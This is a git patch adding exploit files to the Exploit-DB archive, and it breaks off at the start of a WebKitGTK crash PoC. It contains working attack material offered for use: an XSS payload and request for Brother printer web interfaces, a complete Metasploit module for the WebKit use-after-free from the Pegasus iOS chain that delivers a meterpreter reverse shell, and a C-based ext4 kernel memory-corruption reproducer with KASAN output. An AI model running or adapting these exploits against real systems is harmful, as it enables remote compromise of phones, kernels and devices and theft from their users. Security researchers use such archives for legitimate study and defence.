From ad4b4f15f3192dece3dd4adc0fa4c607d7aad959 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 6 Jun 2018 05:01:46 +0000
Subject: [PATCH] DB: 2018-06-06

11 changes to exploits/shellcodes

Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption

Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)
Clone2GO Video converter 2.8.2 - Buffer Overflow
10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)
10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
WebKitGTK+ < 2.21.3 - Crash (PoC)

WebKit - not_number defineProperties UAF (Metasploit)

EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting
MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting
Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
Brother HL Series Printers 1.15 - Cross-Site Scripting
Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)
---
 exploits/hardware/webapps/44839.md  |  74 +++++++
 exploits/ios/remote/44836.rb        | 302 ++++++++++++++++++++++++++++
 exploits/linux/dos/44832.txt        | 282 ++++++++++++++++++++++++++
 exploits/linux/local/44842.txt      |  66 ++++++
 exploits/linux/webapps/44843.py     | 219 ++++++++++++++++++++
 exploits/php/webapps/44833.txt      |  25 +++
 exploits/php/webapps/44837.py       |  33 +++
 exploits/windows/local/44834.py     |  34 ++++
 exploits/windows_x86/local/44838.py |  75 +++++++
 exploits/windows_x86/local/44840.py |  71 +++++++
 exploits/windows_x86/local/44841.py |  85 ++++++++
 files_exploits.csv                  |  15 +-
 12 files changed, 1279 insertions(+), 2 deletions(-)
 create mode 100644 exploits/hardware/webapps/44839.md
 create mode 100755 exploits/ios/remote/44836.rb
 create mode 100644 exploits/linux/dos/44832.txt
 create mode 100644 exploits/linux/local/44842.txt
 create mode 100755 exploits/linux/webapps/44843.py
 create mode 100644 exploits/php/webapps/44833.txt
 create mode 100755 exploits/php/webapps/44837.py
 create mode 100755 exploits/windows/local/44834.py
 create mode 100755 exploits/windows_x86/local/44838.py
 create mode 100755 exploits/windows_x86/local/44840.py
 create mode 100755 exploits/windows_x86/local/44841.py

diff --git a/exploits/hardware/webapps/44839.md b/exploits/hardware/webapps/44839.md
new file mode 100644
index 000000000..12535d46d
--- /dev/null
+++ b/exploits/hardware/webapps/44839.md
@@ -0,0 +1,74 @@
+# Exploit Title: [ XSS at Brother HL series printers]
+
+ 
+# Date: [30.05.2018]
+ 
+# Exploit Author: [Huy Kha]
+
+# Vendor Homepage: [http://support.brother.com]
+ 
+# Software Link: [ Website ]
+ 
+# Version: Brother HL series printers.
+
+# Tested on: Mozilla FireFox 
+ 
+# Reflected XSS Payload :
+
+"--!><Svg/OnLoad=(confirm)(1)>"
+
+# Description : Starting searching for printers without having a password. 
+When you see a yellow bar with ''Configure the password'' you can take over the full printer by putting a password on it.
+
+
+# PoC :
+If you want to execute the XSS you need to be loged into the web interface first. 
+
+# Example :
+
+1. Go to the following url: http://127.0.0.1/
+2. Login with ''admin'' as password
+3. Intercept now the request with Burpsuite
+4. The XSS exist in the loginerror.html?url= parameter
+
+4. Demo URL: http://127.0.0.1/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241
+
+
+# Request :
+
+GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: nl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+# Response :
+
+HTTP/1.1 200 OK
+Cache-Control: no-cache
+Content-Length: 3389
+Content-Type: text/html
+Content-Language: nl
+Connection: close
+Server: debut/1.20
+Pragma: no-cache
+
+<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html lang="nl" xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl"><head><meta http-equiv="Content-Script-Type" content="text/javascript" /><meta http-equiv="content-style-type" content="text/css" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><script type="text/javascript" src="/common/js/ews.js"></script>
+ <link rel="stylesheet" type="text/css" href="../common/css/common.css" /> 
+ <link rel="stylesheet" type="text/css" href="../common/css/ews.css" /><title>Brother HL-L2340D series</title></head><body><div id="baseFrame"><div id="frameContainer"><div id="headerFrameContainerLeft"><div id="headerFrameContainerRight"><div id="headerFrameInner"><div id="headerFrame"><div id="modelName"><h1>HL-L2340D series</h1><div class="SetBox" id="SetBoxAuthRight"><div id="SetBoxAuthLeft"><form method="post" action="/general/status.html"><div>Log&#32;in<input type="password" id="LogBox" name="B1d6" /><input type="hidden" name="loginurl" value="/net/net/service_detail.html?service="--!><Svg/OnLoad=(confirm)(1)>"&pageid=241"/><input id="login" type="submit" value="&nbsp;" /></div></form></div></div></div><div id="corporateLogo"><img src="/common/images/logo.gif" alt="Brother" /></div></div><div id="solutions"><div><span><a href="http://solutions.brother.com/cgi-bin/solutions.cgi?MDL=prn088&LNG=en&SRC=DEVICE">Brother<br />Solutions&#32;Center</a></span></div></div><div id="tabMenu"><ul><li><ul><li class="selected"><p>Algemeen</p></li></ul></li></ul></div></div></div></div><div id="mainFrameContainer"><div id="mainFrameTopLeft"><div id="mainFrameTopRight"><div id="mainFrameTopInner"><div id="subTabMenu">&nbsp;</div></div></div></div><div id="mainFrameInner"><div id="subMenu"><div><a href="/general/status.html">Status</a></div><div><a href="/general/reflesh.html" class="subPage">Interval&#32;voor&#32;autom.&#32;vernieuwen</a></div><div><a href="/general/information.html?kind=item">Onderhoudsinformatie</a></div><div><a href="/general/lists.html">Lijsten/Rapporten</a></div><div><a href="/general/find.html">Apparaat&#32;zoeken</a></div><div><a href="/general/contact.html">Contactpersoon&#32;&&#32;locatie</a></div><div><a href="/general/sleep.html">Slaapstand</a></div><div><a href="/general/powerdown.html">Automatisch&#32;uitschakelen</a></div><div><a href="/general/language.html">Taal</a></div><div><a href="/general/panel.html">Paneel</a></div><div><a href="/general/replacetoner.html">Toner&#32;vervangen</a></div></div><div id="rightFrameContainer"><div id="rightFrame"><div id="mainContent"><div id="pageTitle"><h2>Log&#32;in</h2></div><div id="pageContents"><div class="contentsGroup"><p class="noteMessage">Om&#32;deze&#32;pagina&#32;te&#32;openen&#32;moet&#32;u&#32;inloggen.&#32;Log&#32;in&#32;s.v.p.</p></div></div></div></div></div><script type="text/javascript"><!--
+SetMinHeight();
+// --></script></div><div id="mainFrameBottomLeft"><div id="mainFrameBottomRight"><div id="mainFrameBottomInner"></div></div></div></div><div id="footerFrameContainer"><div id="copyright">Copyright(C) 2000-2014 Brother Industries, Ltd. All Rights Reserved.</div><div id="topBack"><a href="#">Top<img src="/common/images/ic_pt.gif" alt="Top" /></a></div></div></div></div></body></html>
+
+
+
+# How to fix it? : Update the printer to Firmware 1.16 and set a new password.
+
+# Screenshot : https://imgur.com/a/3OVTSZ4
+
+
+# Note: The vendor has been contacted on 30-5-2018.
\ No newline at end of file
diff --git a/exploits/ios/remote/44836.rb b/exploits/ios/remote/44836.rb
new file mode 100755
index 000000000..0d929dc5a
--- /dev/null
+++ b/exploits/ios/remote/44836.rb
@@ -0,0 +1,302 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WebKit not_number defineProperties UAF',
+      'Description'    => %q{
+          This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'qwertyoruiop', # jbme.qwertyoruiop.com
+        'siguza',       # PhoenixNonce
+        'tihmstar',     # PhoenixNonce
+        'timwr',        # metasploit integration
+        ],
+      'References'     => [
+          ['CVE', '2016-4655'],
+          ['CVE', '2016-4656'],
+          ['CVE', '2016-4657'],
+          ['BID', '92651'],
+          ['BID', '92652'],
+          ['BID', '92653'],
+          ['URL', 'https://blog.lookout.com/trident-pegasus'],
+          ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],
+          ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],
+          ['URL', 'https://github.com/Siguza/PhoenixNonce'],
+          ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
+          ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
+        ],
+      'Arch'           => ARCH_AARCH64,
+      'Platform'       => 'apple_ios',
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
+      'Targets'        => [[ 'Automatic', {} ]],
+      'DisclosureDate' => 'Aug 25 2016'))
+    register_options(
+      [
+        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
+        OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
+      ])
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Request from #{request['User-Agent']}")
+    if request.uri =~ %r{/loader$}
+      print_good("Target is vulnerable.")
+      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
+      loader_data = File.read(local_file, {:mode => 'rb'})
+      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+      return
+    elsif request.uri =~ %r{/exploit$}
+      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
+      loader_data = File.read(local_file, {:mode => 'rb'})
+      payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
+      payload_url_index = loader_data.index('PAYLOAD_URL')
+      loader_data[payload_url_index, payload_url.length] = payload_url
+      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+      print_status("Sent exploit (#{loader_data.size} bytes)")
+      return
+    end
+    html = %Q^
+<html>
+<body>
+<script>
+ function load_binary_resource(url) {
+   var req = new XMLHttpRequest();
+   req.open('GET', url, false);
+   req.overrideMimeType('text/plain; charset=x-user-defined');
+   req.send(null);
+   return req.responseText;
+ }
+ var mem0 = 0;
+ var mem1 = 0;
+ var mem2 = 0;
+
+ function read4(addr) {
+  mem0[4] = addr;
+  var ret = mem2[0];
+  mem0[4] = mem1;
+  return ret;
+ }
+
+ function write4(addr, val) {
+  mem0[4] = addr;
+  mem2[0] = val;
+  mem0[4] = mem1;
+ }
+ filestream = load_binary_resource("exploit")
+ var shll = new Uint32Array(filestream.length / 4);
+ for (var i = 0; i < filestream.length;) {
+  var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
+  shll[i / 4] = word;
+  i += 4;
+ }
+ _dview = null;
+ function u2d(low, hi) {
+  if (!_dview) _dview = new DataView(new ArrayBuffer(16));
+  _dview.setUint32(0, hi);
+  _dview.setUint32(4, low);
+  return _dview.getFloat64(0);
+ }
+ var pressure = new Array(100);
+ var bufs = new Array(10000);
+ dgc = function() {
+  for (var i = 0; i < pressure.length; i++) {
+   pressure[i] = new Uint32Array(0x10000);
+  }
+  for (var i = 0; i < pressure.length; i++) {
+   pressure[i] = 0;
+  }
+ }
+
+ function swag() {
+  if (bufs[0]) return;
+  for (var i = 0; i < 4; i++) {
+    dgc();
+  }
+  for (i = 0; i < bufs.length; i++) {
+   bufs[i] = new Uint32Array(0x100 * 2)
+   for (k = 0; k < bufs[i].length;) {
+    bufs[i][k++] = 0x41414141;
+    bufs[i][k++] = 0xffff0000;
+   }
+  }
+ }
+ var trycatch = "";
+ for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
+ var fc = new Function(trycatch);
+ var fcp = 0;
+ var smsh = new Uint32Array(0x10)
+
+ function smashed(stl) {
+  document.body.innerHTML = "";
+  var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
+  write4(jitf, 0xd28024d0);         //movz x16, 0x126
+  write4(jitf + 4, 0x58000060);     //ldr x0, 0x100007ee4
+  write4(jitf + 8, 0xd4001001);     //svc 80
+  write4(jitf + 12, 0xd65f03c0);    //ret
+  write4(jitf + 16, jitf + 0x20);
+  write4(jitf + 20, 1);
+  fc();
+  var dyncache = read4(jitf + 0x20);
+  var dyncachev = read4(jitf + 0x20);
+  var go = 1;
+  while (go) {
+   if (read4(dyncache) == 0xfeedfacf) {
+    for (i = 0; i < 0x1000 / 4; i++) {
+     if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
+     {
+      go = 0;
+      break;
+     }
+    }
+   }
+   dyncache += 0x1000;
+  }
+  dyncache -= 0x1000;
+  var bss = [];
+  var bss_size = [];
+  for (i = 0; i < 0x1000 / 4; i++) {
+   if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
+    bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
+    bss_size.push(read4(dyncache + i * 4 + (0x28)));
+   }
+  }
+  var shc = jitf;
+  var filestream = load_binary_resource("loader")
+  for (var i = 0; i < filestream.length;) {
+   var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
+   write4(shc, word);
+   shc += 4;
+   i += 4;
+  }
+  jitf &= ~0x3FFF;
+  jitf += 0x8000;
+  write4(shc, jitf);
+  write4(shc + 4, 1);
+  // copy macho
+  for (var i = 0; i < shll.length; i++) {
+   write4(jitf + i * 4, shll[i]);
+  }
+  for (var i = 0; i < bss.length; i++) {
+   for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
+    write4(bss[i] + k * 4, 0);
+   }
+  }
+  fc();
+ }
+
+ function go_() {
+  if (smsh.length != 0x10) {
+   smashed();
+   return;
+  }
+  dgc();
+  var arr = new Array(0x100);
+  var yolo = new ArrayBuffer(0x1000);
+  arr[0] = yolo;
+  arr[1] = 0x13371337;
+  var not_number = {};
+  not_number.toString = function() {
+   arr = null;
+   props["stale"]["value"] = null;
+   swag();
+   return 10;
+  };
+  var props = {
+   p0: {
+    value: 0
+   },
+   p1: {
+    value: 1
+   },
+   p2: {
+    value: 2
+   },
+   p3: {
+    value: 3
+   },
+   p4: {
+    value: 4
+   },
+   p5: {
+    value: 5
+   },
+   p6: {
+    value: 6
+   },
+   p7: {
+    value: 7
+   },
+   p8: {
+    value: 8
+   },
+   length: {
+    value: not_number
+   },
+   stale: {
+    value: arr
+   },
+   after: {
+    value: 666
+   }
+  };
+  var target = [];
+  var stale = 0;
+  Object.defineProperties(target, props);
+  stale = target.stale;
+  stale[0] += 0x101;
+  stale[1] = {}
+  for (var z = 0; z < 0x1000; z++) fc();
+  for (i = 0; i < bufs.length; i++) {
+   for (k = 0; k < bufs[0].length; k++) {
+    if (bufs[i][k] == 0x41414242) {
+     stale[0] = fc;
+     fcp = bufs[i][k];
+     stale[0] = {
+      'a': u2d(105, 0),
+      'b': u2d(0, 0),
+      'c': smsh,
+      'd': u2d(0x100, 0)
+     }
+     stale[1] = stale[0]
+     bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
+     bck = stale[0][4];
+     stale[0][4] = 0; // address, low 32 bits
+     // stale[0][5] = 1; // address, high 32 bits == 0x100000000
+     stale[0][6] = 0xffffffff;
+     mem0 = stale[0];
+     mem1 = bck;
+     mem2 = smsh;
+     bufs.push(stale)
+     if (smsh.length != 0x10) {
+      smashed(stale[0]);
+     }
+     return;
+    }
+   }
+  }
+  setTimeout(function() {
+    document.location.reload();
+  }, 2000);
+ }
+
+dgc();
+setTimeout(go_, 200);
+</script>
+</body>
+</html>
+    ^
+    send_response(cli, html, {'Content-Type'=>'text/html'})
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/dos/44832.txt b/exploits/linux/dos/44832.txt
new file mode 100644
index 000000000..06960e71e
--- /dev/null
+++ b/exploits/linux/dos/44832.txt
@@ -0,0 +1,282 @@
+ext4 can store data for small regular files as "inline data", meaning that the
+data is stored inside the corresponding inode instead of in separate blocks.
+Inline data is stored in two places: The first 60 bytes go in the i_block field
+in the inode (which normally contains a list of blocks instead), the rest goes
+in the special filesystem-internal extended attribute "system.data".
+
+Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can
+store extended attribute values not only inline in the inode, but can also store
+such values in dedicated inodes.
+
+When a corrupted filesystem stores the system.data extended attribute value in a
+dedicated inode, the kernel gets confused, causing memory corruption.
+
+
+
+ext4_find_inline_data_nolock() attempts to locate an inode's inline data by
+searching for the system.data xattr using ext4_xattr_ibody_find().
+If the inode has xattrs, ext4_xattr_ibody_find() first checks them for
+corruption using xattr_check_inode(), then grabs the wanted xattr using
+xattr_find_entry().
+xattr_check_inode() uses ext4_xattr_check_entries() to check the individual
+xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr
+whose value is in a dedicated inode) - only for inline values, length and offset
+checks are performed to ensure that the value actually fits into the inode.
+The problem is that ext4_find_inline_data_nolock() then assumes that the
+returned xattr uses inline storage and that the returned length will fit into
+the inode; it stores the length field from the xattr in
+`EXT4_I(inode)->i_inline_size` without further checks.
+
+Later, when the file is read, ext4_read_inline_data() trusts this length value,
+causing an out-of-bounds memcpy() in the following line:
+
+    memcpy(buffer,
+           (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len);
+
+
+
+To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on:
+
+1. Create a new ext4 filesystem image, with 256-byte inodes and inline data
+support:
+
+    $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k
+    mke2fs 1.43.7 (16-Oct-2017)
+    Creating regular file testfs.img
+
+    Filesystem too small for a journal
+    Creating filesystem with 100 4k blocks and 64 inodes
+
+    Allocating group tables: done                            
+    Writing inode tables: done                            
+    Writing superblocks and filesystem accounting information: done
+
+2. Create a 75-byte file in the new filesystem:
+
+    $ mkdir mount
+    $ sudo mount testfs.img mount
+    $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile
+    1+0 records in
+    1+0 records out
+    75 bytes copied, 0.000811554 s, 92.4 kB/s
+    $ sudo umount mount
+
+3. Bump up the inode size, bump up the xattr size, and mark the xattr value as
+   non-inline:
+
+    $ cat fixup.c
+    #include <stdint.h>
+    #include <fcntl.h>
+    #include <err.h>
+    #include <stdio.h>
+    #include <stdlib.h>
+    #include <sys/mman.h>
+    #include <sys/stat.h>
+
+    #define __le16 uint16_t
+    #define __le32 uint32_t
+    #define __u16 uint16_t
+    #define __u32 uint32_t
+    #define __u8 uint8_t
+
+    /* some definitions from kernel headers */
+    #define EXT4_NDIR_BLOCKS    12
+    #define EXT4_IND_BLOCK      EXT4_NDIR_BLOCKS
+    #define EXT4_DIND_BLOCK     (EXT4_IND_BLOCK + 1)
+    #define EXT4_TIND_BLOCK     (EXT4_DIND_BLOCK + 1)
+    #define EXT4_N_BLOCKS       (EXT4_TIND_BLOCK + 1)
+    #define EXT4_XATTR_MAGIC    0xEA020000
+    struct ext4_inode {
+      __le16  i_mode;
+      __le16  i_uid;
+      __le32  i_size_lo;
+      __le32  i_atime;
+      __le32  i_ctime;
+      __le32  i_mtime;
+      __le32  i_dtime;
+      __le16  i_gid;
+      __le16  i_links_count;
+      __le32  i_blocks_lo;
+      __le32  i_flags;
+      union {
+        struct {
+          __le32  l_i_version;
+        } linux1;
+      } osd1;
+      __le32  i_block[EXT4_N_BLOCKS];
+      __le32  i_generation;
+      __le32  i_file_acl_lo;
+      __le32  i_size_high;
+      __le32  i_obso_faddr;
+      union {
+        struct {
+          __le16  l_i_blocks_high;
+          __le16  l_i_file_acl_high;
+          __le16  l_i_uid_high;
+          __le16  l_i_gid_high;
+          __le16  l_i_checksum_lo;
+          __le16  l_i_reserved;
+        } linux2;
+      } osd2;
+      __le16  i_extra_isize;
+      __le16  i_checksum_hi;
+      __le32  i_ctime_extra;
+      __le32  i_mtime_extra;
+      __le32  i_atime_extra;
+      __le32  i_crtime;
+      __le32  i_crtime_extra;
+      __le32  i_version_hi;
+      __le32  i_projid;
+    };
+    struct ext4_xattr_ibody_header {
+      __le32  h_magic;
+    };
+    struct ext4_xattr_entry {
+      __u8  e_name_len;
+      __u8  e_name_index;
+      __le16  e_value_offs;
+      __le32  e_value_inum;
+      __le32  e_value_size;
+      __le32  e_hash;
+      char  e_name[0];
+    };
+
+    #define INODE_SIZE 256
+
+    #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) )
+
+    int main(int argc, char **argv) {
+      char *path = argv[1];
+      int fd = open(path, O_RDWR);
+      if (fd == -1) err(1, "open");
+      struct stat st;
+      if (fstat(fd, &st)) err(1, "fstat");
+      char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
+      if (map == MAP_FAILED) err(1, "mmap");
+      for (int i=0; i<st.st_size/INODE_SIZE; i++) {
+        struct ext4_inode *ino = (void*)(map + i * INODE_SIZE);
+        if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue;
+        printf("found inode (idx=%d, size=%u, mode=%ho)\n",
+               i, ino->i_size_lo, ino->i_mode);
+        ino->i_size_lo = 60000;
+        printf("  i_extra_isize = %hu\n", ino->i_extra_isize);
+        struct ext4_xattr_ibody_header *hdr =
+            (void*)( ((char*)ino)+128+ino->i_extra_isize );
+        if (hdr->h_magic != EXT4_XATTR_MAGIC) continue;
+        struct ext4_xattr_entry *entry = (void*)(hdr+1);
+        while (*(uint32_t*)entry != 0) {
+          printf("  attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n",
+              entry->e_name_index, entry->e_name_len, entry->e_name,
+              entry->e_value_offs, entry->e_value_inum, entry->e_value_size);
+          entry->e_value_offs = 0;
+          entry->e_value_inum = 20;
+          entry->e_value_size = 60000;
+          entry = (void*)(
+              (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4)
+          );
+        }
+      }
+    }
+    $ gcc -o fixup fixup.c -Wall
+    $ ./fixup testfs.img
+    found inode (idx=555, size=75, mode=100644)
+      i_extra_isize = 32
+      attr: idx=7 name='data' offs=76 inum=0 size=15
+
+4. Use fsck to fix up the inode checksum (but don't let it fix anything else!):
+
+    $ fsck.ext4 -f testfs.img
+    e2fsck 1.43.7 (16-Oct-2017)
+    Pass 1: Checking inodes, blocks, and sizes
+    Inode 12 has INLINE_DATA_FL flag but extended attribute not found.  Truncate<y>? no
+    Extended attribute in inode 12 has a value size (60000) which is invalid
+    Clear<y>? no
+    Inode 12 passes checks, but checksum does not match inode.  Fix<y>? yes
+    Pass 2: Checking directory structure
+    Pass 3: Checking directory connectivity
+    Pass 4: Checking reference counts
+    Pass 5: Checking group summary information
+
+    testfs.img: ***** FILE SYSTEM WAS MODIFIED *****
+
+    testfs.img: ********** WARNING: Filesystem still has errors **********
+
+    testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks
+
+5. Mount the filesystem again:
+
+    $ sudo mount testfs.img mount
+
+6. Read the file:
+
+    $ hexdump -C mount/testfile
+    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+    *
+    00000030  00 00 00 00 00 00 00 00  00 00 00 00 04 07 00 00  |................|
+    00000040  14 00 00 00 60 ea 00 00  00 00 00 00 64 61 74 61  |....`.......data|
+    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+    *
+    000004a0  31 00 00 00 00 00 00 00  e0 d1 fc 98 d7 7f 00 00  |1...............|
+    000004b0  e0 07 03 99 d7 7f 00 00  00 00 00 00 00 00 00 00  |................|
+    000004c0  00 00 00 00 00 00 00 00  e0 5f 00 00 00 00 00 00  |........._......|
+    000004d0  64 00 00 00 00 00 00 00  f0 af 02 99 d7 7f 00 00  |d...............|
+    000004e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
+    [...]
+
+7. Check dmesg:
+
+    $ dmesg
+    [...]
+    [ 3211.552729] ==================================================================
+    [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4]
+    [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922
+
+    [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7
+    [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016
+    [ 3211.552799] Call Trace:
+    [ 3211.552807]  dump_stack+0x71/0xab
+    [ 3211.552813]  print_address_description+0x6a/0x250
+    [ 3211.552817]  kasan_report+0x258/0x380
+    [ 3211.552863]  ? ext4_read_inline_data+0x114/0x120 [ext4]
+    [ 3211.552867]  memcpy+0x34/0x50
+    [ 3211.552914]  ext4_read_inline_data+0x114/0x120 [ext4]
+    [ 3211.552961]  ext4_read_inline_page+0x1e4/0x2a0 [ext4]
+    [ 3211.553006]  ? ext4_read_inline_data+0x120/0x120 [ext4]
+    [ 3211.553053]  ext4_readpage_inline+0x13e/0x160 [ext4]
+    [ 3211.553101]  ext4_readpage+0xf5/0x110 [ext4]
+    [ 3211.553106]  generic_file_read_iter+0x9a4/0xea0
+    [ 3211.553112]  ? filemap_range_has_page+0x160/0x160
+    [ 3211.553116]  ? save_stack+0x89/0xb0
+    [ 3211.553120]  ? __kasan_slab_free+0x105/0x150
+    [ 3211.553124]  ? aa_path_link+0x1f0/0x1f0
+    [ 3211.553128]  ? do_syscall_64+0x150/0x160
+    [ 3211.553132]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
+    [ 3211.553137]  ? audit_watch_compare+0x1b/0x50
+    [ 3211.553142]  __vfs_read+0x239/0x340
+    [ 3211.553145]  ? __x64_sys_copy_file_range+0x2d0/0x2d0
+    [ 3211.553149]  ? dput.part.19+0x2e/0x1b0
+    [ 3211.553154]  ? auditd_test_task+0x43/0x60
+    [ 3211.553158]  vfs_read+0xa5/0x190
+    [ 3211.553162]  ksys_read+0xa1/0x120
+    [ 3211.553166]  ? kernel_write+0xa0/0xa0
+    [ 3211.553171]  do_syscall_64+0x6d/0x160
+    [ 3211.553175]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
+    [ 3211.553178] RIP: 0033:0x7f9ada1af72c
+    [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
+    [...]
+    [ 3211.553197] The buggy address belongs to the page:
+    [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0
+    [ 3211.553207] flags: 0x17fffc000000021(locked|lru)
+    [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff
+    [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0
+    [ 3211.553222] page dumped because: kasan: bad access detected
+    [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0
+
+    [ 3211.553229] Memory state around the buggy address:
+    [ 3211.553234]  ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+    [ 3211.553238]  ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+    [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
+    [ 3211.553246]                    ^
+    [ 3211.553250]  ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
+    [ 3211.553254]  ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
+    [ 3211.553257] ==================================================================
\ No newline at end of file
diff --git a/exploits/linux/local/44842.txt b/exploits/linux/local/44842.txt
new file mode 100644
index 000000000..3cb31787e
--- /dev/null
+++ b/exploits/linux/local/44842.txt
@@ -0,0 +1,66 @@
+# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) 
+# Author: Dhiraj Mishra
+# Date: 2018-06-05
+# Software: https://webkitgtk.org/
+# CVE: CVE-2018-11646
+# Summary:
+# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in 
+# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, 
